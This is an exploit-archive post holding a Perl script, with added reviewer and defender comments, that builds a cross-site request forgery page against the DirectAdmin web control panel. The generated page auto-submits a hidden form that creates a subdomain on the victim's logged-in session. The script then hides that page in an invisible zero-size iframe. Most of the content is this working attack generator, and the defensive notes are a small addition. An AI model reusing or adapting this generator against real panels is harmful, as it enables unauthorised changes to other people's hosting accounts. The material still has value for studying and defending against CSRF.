
DirectAdmin Cross Site Request Forgery

Posted on 24 January 2012

#!/usr/bin/perl
########################################################################
# Title     : DirectAdmin Web Control Panel © 2005 JBMC Software
# Author    : Onur TÜRKEŞHAN
# Homepage  : http://www.directadmin.com/
# tested on : Windows 7
# Dedication (translated from Turkish): "We will not forget you, MIRIM"
#
# Reviewer summary: interactive generator for a cross-site request forgery
# proof-of-concept page. It reads a host name and a subdomain name from
# STDIN, appends an auto-submitting HTML form to csrf.htm, then prints an
# <iframe> snippet whose src is a location typed in by the operator.
#
# The generated form POSTs action=create, domain and subdomain to
# /CMD_SUBDOMAIN on port 2222 of the entered host (plain http) and carries
# no anti-CSRF token field. The PoC therefore presumes the panel authorises
# the request on the browser's existing session alone -- presumably true of
# the version the author tested; the page names no affected version.
#
# Defender notes:
#   * State-changing panel endpoints should require an unpredictable
#     per-session or per-request token and should validate Origin/Referer;
#     SameSite session cookies limit cross-site POSTs of this kind.
#   * In access logs, look for POSTs to CMD_SUBDOMAIN whose Referer/Origin
#     is not the panel itself, and for subdomains nobody requested.
#   * The listing is kept exactly as published; only comments were added.
########################################################################

# Clear the console via the Windows "cls" command.
system("cls");
# Banner, followed by a cosmetic pause.
print " +----------------------------------------+ | directadmin csrf vuln creator by turkeshan | | cyber-warrior.org lojistik grup | +----------------------------------------+ Loading ... ";
sleep(3);
# Prompt text is Turkish for "site name"; the reply is stored in $h and is
# used below both as the host in the form's action URL and as the "domain"
# field value.
print "Site aDi ";
$h = <STDIN>;
chomp $h;
# Prompt text is Turkish for "subdomain name"; the reply is stored in $sub.
print "Sub Domain Adi ";
$sub = <STDIN>;
chomp $usub;
# Build the PoC page as one string. The form is named "info"; the inline
# <script> inside it calls document.info.submit(), so the POST is sent
# without any click from the person viewing the page. $h and $sub are
# concatenated into the markup without HTML escaping.
$html = '<form name=info action="http://'.$h.':2222/CMD_SUBDOMAIN?domain='.$h.'" method="POST"> <input type=hidden name=action value="create"> <input type=hidden name=domain value="'.$h.'"> <input type=text name=subdomain size=8 value="'.$sub.'"> <script>document.info.submit();</script> </form>';
sleep(2);
# Status message (Turkish: "being created").
print "olusturuluyor ... ";
# Append ('>>') the markup to csrf.htm in the current directory through the
# bareword handle XSS. The result of open() is not checked, so a failed
# open goes unreported.
open(XSS , '>>csrf.htm');
print XSS $html;
close(XSS);
# Status message (Turkish: "created").
print "olusturuldu .. ";
sleep(2);
# Asks (in Turkish) for the name under which csrf.htm was published; the
# reply is stored in $csrf.
print "dosyayi sitenize upload edin ve dosya ismini yazin";
$csrf = <STDIN>;
chomp $csrf;
# Wrap that location in an <iframe> with width and height 0, i.e. a frame
# that takes up no visible space on the embedding page. $csrf is inserted
# into the src attribute without escaping.
$done = '<iframe id="iframe" src="'.$csrf.'" width="0" height="0"></iframe>';
sleep(2);
# Final status messages (Turkish) and the iframe snippet, printed to STDOUT.
print "exploit basariyla tamamlandi ";
print $done." ";
print "";
print " hayrini gorun .. ";

 
